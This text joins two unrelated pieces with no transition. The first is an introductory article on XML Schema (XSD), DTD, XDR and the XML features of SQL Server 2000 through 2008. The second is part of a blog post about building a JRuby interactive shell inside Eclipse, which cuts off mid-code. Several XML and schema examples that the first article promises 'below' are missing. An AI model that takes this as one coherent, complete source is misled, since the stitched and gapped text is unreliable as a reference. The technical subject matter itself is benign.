Catching and handling errors ensures our users aren't confused when something goes wrong, also giving them a way to get home or back to the content.
Flask provides us with a simple way to throw and catch errors, along with displaying a custom HTML template for each error. When an HTTP error is raised, for example a
404 Not Found or
500 Internal Server Error, we can catch it, handle it and return something relevant to the exception.
Throwing errors
There may be times when you need to manually throw an error, for example if an unauthenticated user was trying to access a protected route or if a certain request method isn't allowed.
Flask provides us with the
abort() function, to which we can supply the HTTP status code related to the error.
We need to import it from Flask:
from flask import abort
To use abort, simply call it and pass in the HTTP status code:
abort(404) # Not found abort(405) # Method Not allowed abort(500) # Internal Server Error
If a user encounters the
abort function, the error will trigger and the browser will display its default page/text for that error (Which normally look quite ugly)
A better solution is to setup an handler to let us decide what happens when one of these errors are encountered.
Custom error handlers
Just as we can throw errors on demand, we can handle them using the
errorhandler() decorator and attaching it to our
app instance.
The syntax for a custom error handler:
@app.errorhandler(STATUS_CODE) def function_name(error): # Do something here.. # Log the error.. # Send en email.. # Etc .. return render_template("handler.html"), STATUS_CODE
For example, an error handler for a
403 Forbidden status code:
@app.errorhandler(403) def forbidden(e): return render_template("error_handlers/forbidden.html"), 403
Not found
404:
from flask import request @app.errorhandler(404) def page_not_found(e): app.logger.info(f"Page not found: {request.url}") return render_template("error_handlers/404.html"), 404
Server error
500:
from flask import request @app.errorhandler(500) def server_error(e): email_admin(message="Server error", url=request.url, error=e) app.logger.error(f"Server error: {request.url}") return render_template("error_handlers/500.html"), 500
Error templates
Default browser error pages aren't pretty:
A better looking example of a 404 page from the Mozilla developer site:
Just as you would normally return a template in a route using
render_template() and passing it an HTML file, we've done the same in our custom error handlers.
We've created our error HTML files and placed them in a directory called
error_handlers, giving each HTML file the name corresponding to the error which we then call with
render_template, passing it the path to the relevant handler file.
Wrapping up
Throwing strategic errors is as simple as calling
abort() and passing it an HTTP status code.
Handling errors and creating custom error pages is also simple with
@app.errorhandler(STATUS) and writing a function to handle the error and return a relevant response.
|
https://pythonise.com/series/learning-flask/flask-error-handling
|
CC-MAIN-2021-17
|
refinedweb
| 541
| 53.71
|
What is an XML Schema?
An XML Schema is a document which describes another XML document. XML Schemas are used to validate XML documents. An XML schema itself is an XML document which contains the rules to be validated against a given XML instance document.
When do we need an XML schema?
When we write a piece of code (a class, a function, a stored procedure, etc.) which accepts data in XML format, we need to make sure that the data that we receive follows a certain XML structure and should contain values which are coherent. Let us look at an example.
Assume that you are writing a function/method for an application that manages employee data. Your function is expecting the employee information in the following XML structure:
Your function needs to make sure that the caller passes correct XML data. You could make use of an XML Schema to perform this validation. An
XML Schema which describes and validates the above XML document is given below.
By validating the XML data against this schema, you could make sure that the XML document is structured exactly the way your function expects it to be.
To summarize, we need an XML schema when we need to make sure that the XML document that we need to work with is in the expected format. Further, a schema can help to make sure that the values of elements and attributes are within the accepted range (age should be between 18 and 65, Order Date cannot be a future date, etc.) and in the required format (Phone Number should be in the format of (999) 999-9999, Zip Code should have 5 digits, Product Code should start with an upper case letter followed by 5 digits, etc.).
Relevance of XSD
There has been a significant increase in the popularity and usage of XML in the past few years. More and more websites and applications started adopting XML for exchanging or publishing information. A few examples are given below:
- Web sites started publishing information in the form of XML feeds (example: RSS, ATOM, RDF, etc.).
- XML Web services became an integral part of enterprise applications.
- A large number of applications are being written that make use of XML web services such as Google APIs, Amazon Web Services, etc. Many small applications that work with frequently changing information (example: news headlines, stock data, weather information, etc.) rely on XML web services.
- Most of the document formats that we use today can be converted to and from XML. Microsoft Open Office XML Format (.docx) of office 2007 and WordML of Word 2003 are examples of XML support getting into word processing. XML is extensively used for documentation. An example is the XML documentation support extended by Visual Studio.
- More and more web sites are turning to AJAX (Asynchronous Java Script and XML) programming, where data is exchanged in XML format. Many of the web pages today use XSLT to generate HTML from XML data.
- An increasing number of web sites adhere to the XHTML standard.
- Many applications use xml to store session or user related data. Microsoft Dot.net applications use XML files for storing configuration data (web.config and app.config). Reporting Services stores report definitions as XML documents.
When data is managed and exchanged in XML format, there needs to be clear agreement about the structure of the XML document. Values of elements and attributes should be in the expected range as well as in the desired format. There needs to be a contract between the caller and the callee about the XML document being exchanged. Once the contract is defined, there has to be a way to enforce it and validate the XML document to make sure that it adheres to the format defined in the contract.
This is where we need an XML Schema! A Schema provides such a contract. It defines the structure of the XML document. It defines rules to validate the value of elements and attributes as well as their formats. Once a schema is defined, a Schema Validator (For example: XmlValidating Reader class of .NET xml library, SQL Server 2005, etc.) can validate an XML document against the rules defined in the Schema.
Schema Languages
As the usage of XML increased, schema languages were also developed to support the validation requirements. DTD, XDR, SOX, Schematron, DSD, DCD, DDML, RELAX NG are a few among them. We will have a quick glance into DTD and XDR in this article. An introduction to the other Schema languages is beyond the scope of this article.
Document Type Definition (DTD)
Document Type Definitions (DTD) is one of the commonly used methods for describing XML documents. A DTD can be used to define the basic structure of the XML instance, data type of the attributes, default and fixed values, etc. DTDs are relatively simple and have a compact syntax. On the other side, they have their own syntax. DTD does not provide ample support for common requirements like namespaces, data types, etc.
The following is an approximate representation of the DTD which describes the sample XML we saw previously.
An XML document may have a reference to an external DTD file or can have the DTD embedded as part of the XML file. The XML document given below has embedded DTD information.
The example given below shows an XML document that refers to an external DTD file.
XML-Data Reduced (XDR)
XML-Data Reduced (XDR) was developed in 1998 with the joint effort of Microsoft and University of Edinburgh. The syntax of XDR is very close to that of XSD and is documented at :.
Microsoft implemented XDR in MSXML Parser. SQL Server 2000 supported creating XML using Annotated XDR Schemas. In SQLXML 4.0 Microsoft added support for XSD schemas and deprecated XDR schemas.
An approximate XDR representation of the sample schema (We have seen an XSD version as well as DTD version) is the following:
XML Support in SQL Server 2000
SQL Server 2000 was released with a basic set of XML programming capabilities, which includes generating XML data using FOR XML and reading XML data with OPENXML.
FOR XML
FOR XML helps to generate XML output from the results of a TSQL query. When used with AUTO, RAW or EXPLICIT, FOR XML provides different levels of control over the structure of the XML result being generated.
OPENXML
OPENXML() function shreds an XML document and provides a rowset representation of the XML data.
SQLXML
SQLXML is an add-on which added additional XML capabilities to SQL Server 2000. Before you could access any of those features, SQLXML should be configured in IIS using the MMS snap-in which is installed as part of SQLXML setup.
With the assistance of SQLXML, SQL Server 2000 offered the following additional features:
Querying Data over HTTP
Once SQLXML is configured in IIS, you can send a TSQL statement over HTTP to the server and receive the results.
XML Views
An XML View provides an XML representation of the relational data of one or more tables. Using an XML View, you can run XPath queries on the relational data exposed by the XML View. XML views can be used with Updategrams to perform updates on the database.
Web Services
Another important feature exposed by SQLXML is the capability to expose SQL Server 2000 as a web service. This will enable you to send HTTP SOAP requests to the server to execute stored procedures, functions, etc.
XML Support in SQL Server 2005
In addition to many enhancements to the existing XML features, SQL Server 2005 introduced a new data type: XML. Let us briefly examine the XML capabilities of SQL Server 2005.
FOR XML – To generate XML Data
SQL Server 2000 supported three different modes with FOR XML, namely: RAW, AUTO and EXPLICIT. SQL Server 2005 added a new mode, PATH. The usage of PATH is relatively simple and it helps to achieve many of the complex XML formatting requirements which were possible only with complex usage of EXPLICIT earlier.
XML Data Type
SQL Server 2005 introduced a new data type: XML. An instance of the XML data type represents an XML document or fragment. XML data type can be used to define columns and can also be passed as parameters to functions and stored procedures. Functions can return XML values. You can declare XML variables in TSQL.
XQuery Support
The support for XML data type raised the requirement for querying the XML document stored in an XML column or variable. SQL Server 2005 supports XQuery (XML Query Language). XQuery is a W3C specification designed to provide a flexible and standardized way of querying XML data.
Support for XSD (XML Schema Definition)
SQL Server 2005 supports XSD (XML Schema Definition) to perform validations on the structure and value of XML documents. XML columns and variables can be bound to an XSD schema and the Schema Processing Engine will perform validations on the data, based on the schema definition. Please note that the support of XSD in SQL Server 2005 is still limited.
XML Support Enhancements in SQL Server 2008
SQL Server 2008 added several enhancements to the XML capabilities of the previous version of SQL server.
Schema Validation Enhancements
SQL Server 2008 added a number of enhancements to Schema Validation. Let us quickly examine them.
Lax Validation Support
To increase the flexibility of an XSD schema, wild card components are often used. This is usually done by using elements <xsd:any> or <xsd:anyAttribute>. Wild card components allow adding content that is not known at the time of schema design.
SQL Server 2005 always had options to either “skip” the validation of such elements or to perform a “strict” validation. When validation is “skipped” no validation is applied on such elements. When validation is set to “strict” the elements are always validated.
SQL Server 2008 supports “lax” validation, which validates only elements and attributes for which schema declarations are available. If the schema declaration is not available, the validation will be skipped for those elements and attributes.”lax” validation is explained in Chapter 13 of my book.
Full support for date, time and dateTime data types
XSD specification defines time-zone information as optional with date, time and dateTime data types. However, the XSD implementation of SQL Server 2005 required time zone information to be present with a date, time or dateTime value. However, it did not preserve the time zone information. The value is normalized into UTC date/time.
SQL Server 2008 removes this limitation. You can omit time zone information when storing date, time or dateTime data types. If you include time-zone information, the information is preserved.
We will see these enhancements in Chapter 7 of my book.
Improved support for union and list types
SQL Server 2008 adds support for list types that contains union types. It allows union types that contain list types as well. This is described in Chapter 7 of my book
XQuery Enhancements
SQL Server 2008 adds support for the “let” clause in the “query()” method of the XML data type. Refer to Books Online for a detailed explanation of the “let” clause.
XML DML Enhancements
The only significant DML change is the support for inserting an XML variable (or value of XML type) into another XML variable or XML column (using the XQuery “modify()” method with “insert” operation).
TYPED and UNTYPED XML
SQL Server 2005/2008 supports two flavors of XML known as TYPED and UNTYPED. Typed XML is associated with an XML Schema that defines the structure of the XML variable or column. Any text data can be stored to an UNTYPED XML column or variable as long as it is in XML format. But a TYPED XML column or variable must strictly follow the structure defined in the XML schema (XSD).
TYPED XML has many advantages over UNTYPED XML.
- SQL Server has prior knowledge about a TYPED XML column or variable because it is bound to a schema known to it. This knowledge will help the query optimizer generate better query plans.
- When a TYPED XML is used, SQL Server knows the data types of elements and attributes and can do better query processing.
- SQL Server can perform validations when value is inserted or updated. If the XML document or fragment does not pass all the validations defined in the XML Schema, SQL Server will raise an error and will not modify/insert the data.
By using an XSD schema, you can perform all sorts of validations that need to be done before accepting the XML data. If you work with XML data often you may be familiar with the following requirements, which will make your application less prone to error.
Validate the structure of the XML
Example:
<address> should occur after <name>. <phone> is optional but there should be one or more <item> elements.
Validate the data types
Example:
<zip> should be numeric, <age> should be numeric, <phone> is alpha numeric, <dateOfBirth> should be a valid date value, <maritalStatus> should be Boolean.
Perform restrictions on values
Example:
<hiredate> should not be earlier than 1900. <age> should be between 18 and 80. <itemnumber> should have 3 digits, followed by a “-“ and then 4 alpha-numeric characters.
There are many more validations that we might need to do, depending upon the nature of our application and the type of data that we receive. Performing such validations without the help of a SCHEMA will be extremely difficult most of the time. Think of reading/parsing the XML document using your favorite XML library and validating each element and attribute. Though you could do this for some of the basic validations, most of the real life validations will be impractical to perform without a SCHEMA.
By using an XSD schema you can define all the validation rules using simple XML structure, and SQL Server 2005 will perform all the validations on your behalf.
Load comments
|
https://www.red-gate.com/simple-talk/sql/learn-sql-server/introduction-to-xml-schema/
|
CC-MAIN-2020-24
|
refinedweb
| 2,325
| 63.39
|
From: scs@adam.mit.edu (Steve Summit)
Subject: Re: dynamic function call
Date: Sun, 7 Mar 93 17:58:52 -0500
Message-Id: <9303072258.AA22973@adam.MIT.EDU>
You wrote:
> I was curious to find out your ideas on the below question appearing
> in the C language FAQ:
>
> 7.5: How can I call a function with an argument list built up at run
> time?
>
> A: There is no guaranteed or portable way to do this. If you're
> curious, ask this list's editor, who has a few wacky ideas you
> could try... (See also question 16.10.)
[current version of this question, now numbered 15.13]
Believe it or not, you're the first to have asked, so you get to
be the first to hear me apologize for the fact that several
elaborate discussions of those "wacky ideas" which I've written
at various times are in fact stuck off in my magtape archives
somewhere, not readily accessible.
[The two main ones I was probably thinking of are this one and this one.]
Here is an outline; I'll try to find one of my longer old descriptions and send it later.
The basic idea is to postulate the existence of the following routine:
#include <stdarg.h> callg(funcp, argp) int (*funcp)(); magic_arglist_pointer argp;
This routine calls the function pointed to by funcp, passing to it the argument list pointed to by argp. It returns whatever the pointed-to function returns.
The second question is of course how to construct the argument list pointed to by argp. I've had a number of ideas over the years on how to do this; perhaps the best (or at least the one I'm currently happiest with) is to do something like this:
extern func(); va_alloc(arglist, 10); va_list argp; va_start2(arglist, argp); va_arg(argp, int) = 1; va_arg(argp, double) = 2.3; va_arg(argp, char *) = "four"; va_finish2(arglist, argp); callg(func, arglist);
The above is equivalent to the simple call
func(1, 2.3, "four");
Now, the interesting thing is that it's often (perhaps even "usually") possible to construct va_alloc, va_start2, and va_finish2 macros such as I've illustrated above such that the standard va_arg macro out of <stdarg.h> or <varargs.h> does the real work. (In other words, the traditional implementations of va_arg would in fact work in an lvalue context, i.e. on the left hand side of an assignment.)
I'm fairly sure I've got working versions of macros along the lines of va_alloc, va_start2, and va_finish2 macros somewhere, but I can't find them at the moment, either. At the end of this message I'll append a different set of macros, not predicated on the assumption of being able to re-use the existing va_arg on the left hand side, which should serve as an example of the essential implementation ideas.
A third question is what to do if the return type (not just the argument list) of the called function is not known at compile time. (If you're still with me, we're moving in the direction of doing so much at run time that we've practically stopped compiling and started interpreting, and in fact many of the ideas I'm discussing in this note come out of my attempts to write a full-blown C interpreter.) We can answer the third question by adding a third argument to our hypothetical callg() routine, involving a tag describing the type of result we expect and a union in which any return value can be stored.
A fourth question is how to write this hypothetical callg() function. It is one of my favorite examples of a function that essentially must be written in assembler, not for efficiency, but because it's something you simply can't do in C. It's actually not terribly hard to write; I've got implementations of it for most of the machines I use. I write it for a new environment by compiling a simple little program fragment such as
int nargs; int args[10]; int (*funcp)(); int i; switch(nargs) { case 0: (*funcp)(); break; case 1: (*funcp)(args[0]); break; case 2: (*funcp)(args[0], args[1]); break; ... for(i = 0; i < nargs; i++) (*funcp)(args[i]);
, and massaging the assembly language output to push a variable number of arguments before performing the (single) call. It's possible to do this without knowing very much else about the assembly/machine language in use. (It helps a lot to have a compiler output or listing option which lets you see the its generated assembly language.)
When I say it's generally easy to write callg, I'm thinking of conventional, stack-based machines. Some modern machines pass some or all arguments in registers, and which registers are used can depend on the type of the arguments, which makes this sort of thing much harder.
A fifth question is where my name "callg" comes from. The VAX has a single instruction, CALLG, which does exactly what you want here. (In other words, an assembly-language implementation of this callg() routine is a single line of assembler on the VAX.) I've also used the name va_call instead of callg.
If you have questions or comments prompted by any of this, or if you'd like to see more code fragments, feel free to ask.
Steve SummitSteve Summit
[The aforementioned "set of macros" is in this file: varargs2.h .]
|
http://c-faq.com/varargs/invvarargs.19930307.html
|
CC-MAIN-2013-20
|
refinedweb
| 913
| 67.59
|
Using blocks in Ruby
With this excerpt from Head First Ruby, you’ll learn about Ruby blocks by looking at each concept from different angles.
A block is a chunk of code that you associate with a method call. While the method runs, it can invoke (execute) the block one or more times. Methods and blocks work in tandem to process your data. Blocks are a way of encapsulating or packaging statements up and using them wherever you need them. They turn up all over Ruby code.
Blocks are mind-bending stuff. But stick with it!
Even if you’ve programmed in other languages, you’ve probably never seen anything like blocks. But stick with it, because the payoff is big.
Imagine if, for all the methods you have to write for the rest of your career, someone else wrote half of the code for you. For free. They’d write all the tedious stuff at the beginning and end, and just leave a little blank space in the middle for you to insert your code, the clever code, the code that runs your business.
If we told you that blocks can give you that, you’d be willing to do whatever it takes to learn them, right?
Well, here’s what you’ll have to do: be patient, and persistent. We’re here to help. We’ll look at each concept repeatedly, from different angles. We’ll provide exercises for practice. Make sure to do them, because they’ll help you understand and remember how blocks work.
A few hours of hard work now are going to pay dividends for the rest of your Ruby career, we promise. Let’s get to it!
Defining a method that takes blocks
Blocks and methods work in tandem. In fact, you can’t have a block without also having a method to accept it. So, to start, let’s define a method that works with blocks.
(On this page, we’re going to show you how to use an ampersand,
call method to call that block. This isn’t the quickest way to work with blocks, but it does make it more obvious what’s going on. We’ll show you
yield, which is more commonly used, in a few pages!)
&, to accept a block, and the
Since we’re just starting off, we’ll keep it simple. The method will print a message, invoke the block it received, and print another message.
If you place an ampersand before the last parameter in a method definition, Ruby will expect a block to be attached to any call to that method. It will take the block, convert it to an object, and store it in that parameter.
Remember, a block is just a chunk of code that you pass into a method. To execute that code, stored blocks have a
call instance method that you can call on them. The
call method invokes the block’s code.
Okay, we know, you still haven’t seen an actual block, and you’re going crazy wondering what they look like. Now that the setup’s out of the way, we can show you…
Your first block
Are you ready? Here it comes: your first glimpse of a Ruby block.
There it is! Like we said, a block is just a chunk of code that you pass to a method. We invoke
my_method, which we just defined, and then place a block immediately following it. The method will receive the block in its
my_block parameter.
The start of the block is marked with the keyword
do, and the end is marked by the keyword
end.
The block body consists of one or more lines of Ruby code between
doand
end. You can place any code you like here.
When the block is called from the method, the code in the block body will be executed.
After the block runs, control returns to the method that invoked it.
So we can call my_method and pass it the above block. We pass my_method a single argument, @my_block, so we can refer to the block inside the method.
…and here’s the output we’d see:
Flow of control between a method and block
We declared a method named
my_method, called it with a block, and got this output:
Let’s break down what happened in the method and block, step by step.
The first
putsstatement in
my_method’s body runs.
The method:
def my_method(&my_block) puts "We're in the method, about to invoke your block!" my_block.call puts "We're back in the method!" end
The block:
The
my_block.callexpression runs, and control is passed to the block. The
putsexpression in the block’s body runs.
When the statements within the block body have all run, control returns to the method. The second call to
putswithin
my_method’s body runs, and then the method returns.
Calling the same method with different blocks
You can pass many different blocks to a single method.
We can pass different blocks to the method we just defined, and do different things:
The code in the method is always the same, but you can change the code you provide in the block.
Calling a block multiple times
A method can invoke a block as many times as it wants.
This method is just like our previous one, except that it has two
my_block.call expressions:
The method name is appropriate: as you can see from the output, the method does indeed call our block twice!
Statements in the method body run until the first
my_block.callexpression is encountered. The block is then run. When it completes, control returns to the method.
The method body resumes running. When the second
my_block.callexpression is encountered, the block is run again. When it completes, control returns to the method so that any remaining statements there can run.
Block parameters
We learned back in Chapter 2 that when defining a Ruby method, you can specify that it will accept one or more parameters:
def print_parameters(p1, p2) puts p1, p2 end
You’re probably also aware that you can pass arguments when calling the method that will determine the value of those parameters.
In a similar vein, a method can pass one or more arguments to a block. Block parameters are similar to method parameters; they’re values that are passed in when the block is run, and that can be accessed within the block body.
Arguments to
call get forwarded on to the block:
You can have a block accept one or more parameters from the method by defining them between vertical bar (
|) characters at the start of the block:
So, when we call our method and provide a block, the arguments to
call are passed into the block as parameters, which then get printed. When the block completes, control returns to the method, as normal.
Using the “yield” keyword
So far, we’ve been treating blocks like an argument to our methods. We’ve been declaring an extra method parameter that takes a block as an object, then using the
call method on that object.
def twice(&my_block) my_block.call my_block.call end
We mentioned that this wasn’t the easiest way to accept blocks, though. Now, let’s learn the less obvious but more concise way: the
yield keyword.
The
yield keyword will find and invoke the block a method was called with—there’s no need to declare a parameter to accept the block.
This method is functionally equivalent to the one above:
def twice yield yield end
Just like with
call, we can also give one or more arguments to
yield, which will be passed to the block as parameters. Again, these methods are functionally equivalent:
def give(&my_block) my_block.call("2 turtle doves", "1 partridge") end def give yield "2 turtle doves", "1 partridge" end
Block formats
So far, we’ve been using the
do...end format for blocks. Ruby has a second block format, though: “curly brace” style. You’ll see both formats being used “in the wild,” so you should learn to recognize both.
Aside from
do and
end being replaced with curly braces, the syntax and functionality are identical.
And just as
do...end blocks can accept parameters, so can curly-brace blocks:
By the way, you’ve probably noticed that all our
do...end blocks span multiple lines, but our curly-brace blocks all appear on a single line. This follows another convention that much of the Ruby community has adopted. It’s valid syntax to do it the other way:
But not only is that out of line with the convention, it’s really ugly.
The “each” method
We had a lot to learn in order to get here: how to write a block, how a method calls a block, how a method can pass parameters to a block. And now, it’s finally time to take a good, long look at the method that will let us get rid of that repeated loop code in our
total,
refund, and
show_discounts methods. It’s an instance method that appears on every
Array object, and it’s called
each.
You’ve seen that a method can yield to a block more than once, with different values each time:
The
each method uses this feature of Ruby to loop through each of the items in an array, yielding them to a block, one at a time.
If we were to write our own method that works like
each, it would look very similar to the code we’ve been writing all along:
We loop through each element in the array, just like in our
total,
refund, and
show_discounts methods. The key difference is that instead of putting code to process the current array element in the middle of the loop, we use the
yield keyword to pass the element to a block.
The “each” method, step-by-step
We’re using the
each method and a block to process each of the items in an array:
Let’s go step-by-step through each of the calls to the block and see what it’s doing.
For the first pass through the
whileloop,
indexis set to
0, so the first element of the array gets yielded to the block as a parameter. In the block body, the parameter gets printed. Then control returns to the method,
indexgets incremented, and the
whileloop continues.
Now, on the second pass through the
whileloop,
indexis set to
1, so the second element in the array will be yielded to the block as a parameter. As before, the block body prints the parameter, control then returns to the method, and the loop continues.
After the third array element gets yielded to the block for printing and control returns to the method, the
whileloop ends, because we’ve reached the end of the array. No more loop iterations means no more calls to the block; we’re done!
That’s it! We’ve found a method that can handle the repeated looping code, and yet allows us to run our own code in the middle of the loop (using a block). Let’s put it to use!
DRYing up our code with “each” and blocks
Our invoicing system requires us to implement these three methods. All three of them have nearly identical code for looping through the contents of an array.
It’s been difficult to get rid of that duplication, though, because all three methods have different code in the middle of that loop.
But now we’ve finally mastered the
each method, which loops over the elements in an array and passes them to a block for processing.
Let’s see if we can use
each to refactor our three methods and eliminate the duplication.
First up for refactoring is the
total method. Just like the others, it contains code for looping over prices stored in an array. In the middle of that looping code,
total adds the current price to a total amount.
The
each method looks like it will be perfect for getting rid of the repeated looping code! We can just take the code in the middle that adds to the total, and place it in a block that’s passed to
each.
Let’s redefine our
total method to utilize
each, then try it out.
Perfect! There’s our total amount. The
each method worked!
For each element in the array,
each passes it as a parameter to the block. The code in the block adds the current array element to the
amount variable, and then control returns back to
each.
We’ve successfully refactored the
total method!
But before we move on to the other two methods, let’s take a closer look at how that
amount variable interacts with the block.
Blocks and variable scope
We should point something out about our new
total method. Did you notice that we use the
amount variable both inside and outside the block?
def total(prices) amount = 0 prices.each do |price| amount += price end amount end
As you may remember from Chapter 2, the scope of local variables defined within a method is limited to the body of that method. You can’t access variables that are local to the method from outside the method.
The same is true of blocks, if you define the variable for the first time inside the block.
But, if you define a variable before a block, you can access it inside the block body. You can also continue to access it after the block ends!
Since Ruby blocks can access variables declared outside the block body, our
total method is able to use
each with a block to update the
amount variable.
def total(prices) amount = 0 prices.each do |price| amount += price end amount end
We can call
total like this:
total([3.99, 25.00, 8.99])
The
amount variable is set to
0, and then
each is called on the array. Each of the values in the array is passed to the block. Each time the block is called,
amount is updated:
When the
each method completes,
amount is still set to that final value,
37.98. It’s that value that gets returned from the method.
Using “each” with the “refund” method
We’ve revised the
total method to get rid of the repeated loop code. We need to do the same with the
refund and
show_discounts methods, and then we’ll be done!
The process of updating the
refund method is very similar to the process we used for
total. We simply take the specialized code from the middle of the generic loop code, and move it to a block that’s passed to
each.
Much cleaner, and calls to the method still work just the same as before!
Within the call to
each and the block, the flow of control looks very similar to what we saw in the
total method:
Using “each” with our last method
One more method, and we’re done! Again, with
show_discounts, it’s a matter of taking the code out of the middle of the loop and moving it into a block that’s passed to
each.
Again, as far as users of your method are concerned, no one will notice you’ve changed a thing!
Here’s what the calls to the block look like:
Our complete invoicing methods
Note
Do this!
Save this code in a file named prices.rb. Then try running it from the terminal!
We’ve gotten rid of the repetitive loop code!
We’ve done it! We’ve refactored the repetitive loop code out of our methods! We were able to move the portion of the code that differed into blocks, and rely on a method,
each, to replace the code that remained the same!
Utilities and appliances, blocks and methods
Imagine two electric appliances: a mixer and a drill. They have very different jobs: one is used for baking, the other for carpentry. And yet they have a very similar need: electricity.
Now, imagine a world where, any time you wanted to use an electric mixer or drill, you had to wire your appliance into the power grid yourself. Sounds tedious (and fairly dangerous), right?
That’s why, when your house was built, an electrician came and installed power outlets in every room. The outlets provide the same utility (electricity) through the same interface (an electric plug) to very different appliances.
The electrician doesn’t know the details of how your mixer or drill works, and he doesn’t care. He just uses his skills and training to get the current safely from the electric grid to the outlet.
Likewise, the designers of your appliances don’t have to know how to wire a home for electricity. They only need to know how to take power from an outlet and use it to make their devices operate.
You can think of the author of a method that takes a block as being kind of like an electrician. They don’t know how the block works, and they don’t care. They just use their knowledge of a problem (say, looping through an array’s elements) to get the necessary data to the block.
def wire yield "current" end
You can think of calling a method with a block as being kind of like plugging an appliance into an outlet. Like the outlet supplying power, the block parameters offer a safe, consistent interface for the method to supply data to your block. Your block doesn’t have to worry about how the data got there, it just has to process the parameters it’s been handed.
Not every appliance uses electricity, of course; some require other utilities. There are stoves and furnaces that require gas. There are automatic sprinklers and spray nozzles that use water.
Just as there are many kinds of utilities to supply many kinds of appliances, there are many methods in Ruby that supply data to blocks. The
each method was just the beginning. Blocks, also sometimes known as lambdas, are crucial components of Ruby. They are used in loops, in functions that have to run code at some future time (known as callbacks), and other contexts.
|
https://www.oreilly.com/content/using-blocks-in-ruby/
|
CC-MAIN-2022-21
|
refinedweb
| 3,057
| 80.21
|
10 replies on
1 page.
Most recent reply:
Oct 1, 2011 1:19 PM
by
Edward Garson
Like so many others my
imagination has been captured by Ruby. Perhaps it is because of the steep rise
in its awareness the software development community has undergone since Rails,
perhaps it is a combination of its quirky constructs, enthusiastic (and often
surreal) proponents, and the fact that DSLs are
gaining respect and momentum. At the
same time, the JVM is becoming an obvious platform choice and Java itself is
starting to look a little tired and lost as a language.
Perhaps Java is reaching its
sell-by date, after all, there do seem to be natural universal laws about these things; and
they apply to a great many domains. Fashion, empires and programming languages
are three that I can think of which adhere to these rules. They rise, dominate
and fall. Sometimes they come back, (like flared trousers and interpreters) but
even if they die, they always leave their legacy, like the Roman
Empire, or Cobol.
Anyway, it is obvious that however long it stays in vogue, one such mark that will be left by Java is the JVM as a platform, and fascinated as I am by Ruby, I think that JRuby is
(together with Rails) what will really keep it on the map. I find myself more
and more regularly explaining to colleagues and clients (partly to prevent them
rolling their eyes as one does when faced with a religious fanatic, or a pushy
salesperson) that I only really love Ruby and crowbar it into every discussion
I can, because compiled languages like
Java exist. JRuby makes using Ruby sensible (and
cool).
Why is this cool? Because
like so many consultants, it is my job it is to help people come up with general,
repeatable solutions to their problems, so I am always on the lookout for some
sort of lazy reuse idea. Since all clients want those three very simple and clearly
mutually exclusive features that constantly haunt us, i.e. good, fast and
cheap, I find myself drawn to the model of leveraging powerful application
libraries with glue code or something minimal, scriptable and clever.
JRuby fits that bill quite nicely.
Or does it? Isn’t this falling into the old trap of trying getting non-programmers to write programs? Haven’t previous attempts at this
failed? Languages like BPEL and Visual
Basic and even (looking back a bit further) Cobol have
all, in their own way, in their own domains tried to make programming easy.
These have all ended up producing horrible languages. In the case of the latter
two they have also produced code bases huge and prevalent by virtue of their
easy proliferation, not their suitability for solving the problem. Not popular
with OO purists and lovers of aesthetically pleasing languages!
Well now we have more languages
like JRuby(and Jython and
Groovy etc.) which allow us pleasing constructs, great power and efficient
syntax together with access to Java libraries and access to any platform which
has a JVM implementation. More importantly, perhaps, is that this translates into access to any Java middleware. Excellent! This means that
the powerful application stuff can be written by the software engineers and the
business logic can be written (at least initially) by the domain experts, using
a domain specific language (or domain specific flavour, if language isn't subtle enough).
This should mean that we can give an expert in the domain of feet enough power to shoot
themselves in the foot with a homing missile, and they wouldn't have to be a rocket scientist.
What is doubly pleasing of course, is the fact that Ruby by its nature is dynamic (as are some of the other languages which have JVM
implementations), and building a domain specific
language to solve a problem can be implemented quite elegantly. So helping
prevent our domain experts from getting in too much trouble is a bit easier. We can expose the important bits to them and shield the complexity from them. Very importantly though, they will always have the full power of
the language at their finger tips should they need it.
Triply pleasing perhaps, is
the fact that you can do all of this in an interactive shell (jirb in JRuby) if you want to, which is a great and agile way to
wire up existing domain libraries, or produce "glue code".
You can embark on a learning adventure with a
framework, or library and produce a solution that can form the basis of
something permanent. For example, you
can experiment with the creation of swing applications using
JRuby from the interactive shell. This is so easy that even
a sock puppet could do it (and did, see
here!).
I got to thinking that one
of the environments it would be great to play with was the Eclipse
environment. It is
a mature, fairly solid platform, with a sound plugin model
and some very powerful development tools available in it. What would be great,
I thought, would be if you could script in it, or create macros, even. Creating
an interactive shell would give you access to any plugins
you liked. Certainly it seemed it would be a worthwhile effort plugging in an
interactive shell to see what would happen. As a self-confessed
non-expert-but-fascinated wannabe Ruby-ist, I thought
I could kill two birds with one (precious) stone, i.e. learn more about the language
and learn more about the Eclipse platform at the same time.
How did I do this? Some of
the highlights follow below. If you
really can’t bear the thought of looking through code, or want to see
everything in its entirety, then download this zip which has the Eclipse
plugin and the full source included:
The obvious place to start looking
at how to do this was jirb,
the interactive Ruby shell written for JRuby. Of
course, I thought, this would be a Java console that read in a line of text and
passed it to the Ruby interpreter for evaluation, so it couldn’t be too hard to
re-implement this in an Eclipse app.
After some head scratching,
I realised that this was very cunning and would actually help make my life
easier. I did some investigation into the irb code, and with help from a good
(albeit old) article
by Leonard Richardson about unit testing the Ruby Cookbook source code, I
discovered that redirecting irb input and output is fairly straightforward. Turns out that
all you need to do is extend the Ruby Irb class and
get it to use our own input and output streams. The Irb
class implements the strategy pattern to read from its input stream using an
InputMethod. Creating an Input Method is as simple as
providing a Ruby class which has a gets operation and a prompt= setter method. The
prompt= setter method is necessary, because irb will throw exceptions
without it, (although I admit I am stumped as to why it is there, it doesn’t
seem to do anything other than pass in an empty string.)
I needed to customise my prompt,
and get the line of text typed, so:
class EclipseConsoleInputMethod
# echo the prompt and get a line of input.
def gets
$stdout.print 'eIrb:> '
$stdin.gets
end
def prompt=(x)
end
end
And now, I could minimally extend
the Ruby Irb class to give me a custom
Irb class, which has the right context and some useful
configurations:
class EclipseConsoleIrb < IRB::Irb
def initialize(ec_inputmethod)
IRB.setup(__FILE__)
IRB.conf[:VERBOSE] = false
super(nil, ec_inputmethod)
end
def run
IRB.conf[:MAIN_CONTEXT] = self.context
eval_input
end
end
Not too hard at all!
Now what I needed to do was get an Eclipse
console to provide said input and output streams and pass the typed Ruby code into
the former and echo the results into the latter.
Eclipse’s IO Console does that
job very well, it displays in the normal Eclipse Console area, provides and
input stream for you, and can have multiple output streams directed to it, perfect.
(You can even set colours for the different streams!)
Highlights below:
import org.jruby.Ruby;
public class RubyConsole extends IOConsole implements Runnable {
public void run() {
..
RubyInstanceConfig conf = new RubyInstanceConfig() {
public InputStream getInput() {return in;}
